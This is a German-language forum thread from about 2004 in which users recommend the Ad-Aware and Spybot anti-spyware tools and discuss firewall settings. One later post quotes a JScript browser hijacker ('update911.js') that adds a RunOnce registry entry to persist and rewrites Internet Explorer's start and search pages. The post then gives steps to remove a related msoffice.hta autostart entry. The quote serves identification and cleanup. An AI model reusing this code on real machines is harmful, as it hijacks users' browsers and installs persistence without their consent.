Ihr werdet Augen machen, was so alles bei Euch drauf ist (http://www.bmw-style.de/Ad-aware.zip)


Gruß

Das ist aber kein Virenscanner. Dient "lediglich" der Eliminierung von Werbung und dgl.
Kann aber bestätigen, dass es sehr gut funktioniert. Der erste Scan war in der Tat erschreckend.
Interessanterweise habe ich auf meinem mit ZoneAlarm Pro gesicherten Privatcomputer erheblich weniger Zeugs gefunden, als auf dem durch Routerfirewall gesicherten Büro-PC.

Gruss
Franz

Original geschrieben von Raffael@735i
Ihr werdet Augen machen, was so alles bei Euch drauf ist (http://www.bmw-style.de/Ad-aware.zip)


Gruß

Da gibt es noch was besseres:

Hier clicken, um den SpyBot zu laden (http://www.safer-networking.org/index.php?page=mirrors)

Das Ding findet x-mal mehr als Ad-Aware. Findet auch dialer-Programme übrigens.... :B

Gruß

Crazy

[Bearbeitet am 7.1.2004 um 13:44 von Crazy]

Danke für den Tip @Crazy! :k

Werde ich gleich mal ausprobieren. Der "Erstscan" mit ad-aware war in der Tat wirklich erschreckend @Franz. :nein

Aber mal eine Frage an die Profis: Wie fängt man sich diese Spyware eigentlich ein??? :?

Auf meinem Rechner zuhause kann ich ad-aware auch täglich laufenlassen, irgendwas ist immer! Der Compi hängt übrigens an einem DSL-Router (Teledat), es läuft ein immer upgedatetes Norton Antivirus 2004 und dazu noch ZoneAlarm PRO!

Ist mir einfach unbegreiflich, wie es diese miesen Werbe-Sklaven immer wieder auf meinen PC schaffen!? :mad:
Mit Viren/Trojanern/etc. habe ich mit meinem setting absolut keine Probleme!

Gruss,
MacGregar

[Bearbeitet am 7.1.2004 um 13:54 von MacGregar. Grund: sag ich nicht! ;-P]

Das Spei-Zeuchs holst Du Dir beim ganz normalen Surfen. Wenn Zone-Alarm nur "läuft", heisst das nichts. Auf die Einstellungen kommt es an. Es müssen die Zugriffe von aussen blockiert sein. Wie und wo genau - da müsste ich nachschauen.
Natürlich gibt es im Internet auch unterschiedliche Risikostufen. Auf gewissen Seiten ( :roll ) holt man sich das Gerümpel schneller, als z.B. bei siemens.com. :)

Gruss
Franz

Original geschrieben von Franz3250
Auf gewissen Seiten ( :roll ) holt man sich das Gerümpel schneller, als z.B. bei siemens.com. :)


Was - verdammt nochmal - soll das jetzt heissen??? :mad: :lol

Nein, ich verstehe worauf Du hinaus willst. ;)

Allerdings ist das mit den Sicherheitsstufen so eine Sache. Entweder sicher aber obernervig (wg. ZoneAlarm Pop-Ups) oder "halb-sicher", dafür einigermassen stressfrei! :nein

Naja, irgendwas ist ja immer! :D

Gruss,
MacGregar

Die ZA-Popups kann man abstellen. Zumindest bei der Pro-Version. Müsste aber bei der Basisversion auch gehen.
Im übrigen sind mit :roll -Seiten nicht nur diese gewissen Seiten, sondern auch diverse Warezseiten gemeint. :)
Bei den gewissen Seiten :D ist das Risoko nochmals grösser. Im Warez-Bereich bemühen sich viele "Anbieter" um saubere Seiten. Aber eben auch nicht alle.

Gruss
Franz

Hi.

update911.js (der Monat/Tag/Jahr) September/11 ..Twin-Tower-Desaster.
(Porsche freut sich)

Bremst die Online-Verbindungen mächtig aus und
baut eine Verbindung zu bestimmten Rechnern auf,deren
Link ich hier rausgenommen habe....Vorsichtshalber



var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows \\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Interne t Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");



Bitte prüfen,ob auf dem PC die folgende Datei vorhanden ist:
" C:\WINDOWS\FONTS\msoffice.hta "
... wenn ja, steht vermutlich auch der folgend Schlüssel in der registry:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\]
"Msoffice"="C:\\WINDOWS\\FONTS\\msoffice.hta"

Der Aufruf muß, die Datei sollte entfernt werden.
Vorsichtshalber auch die Run-Schlüssel unter HKCU prüfen.)


Der Fehler entsteht durch ein Skript,das durch die Firewall und Spybot etc.
eine .dll rüberlädt und immer beim Start loslaufen läßt.
Aber so gut getarnt, dass wenige Programme die finden!
(auch Spybot S&D nicht)
Ein Programm geht und zwar "Security Task Manager"
Dieses macht alle aktiven Prozesse sichtbar und man weiß,was sich
im Hintergrund auf dem Rechner tut.


Zum Download HIER (http://www.zdnet.de/downloads/programs/z/r/deXFZR_is-wc.html)


Gruß
Knuffel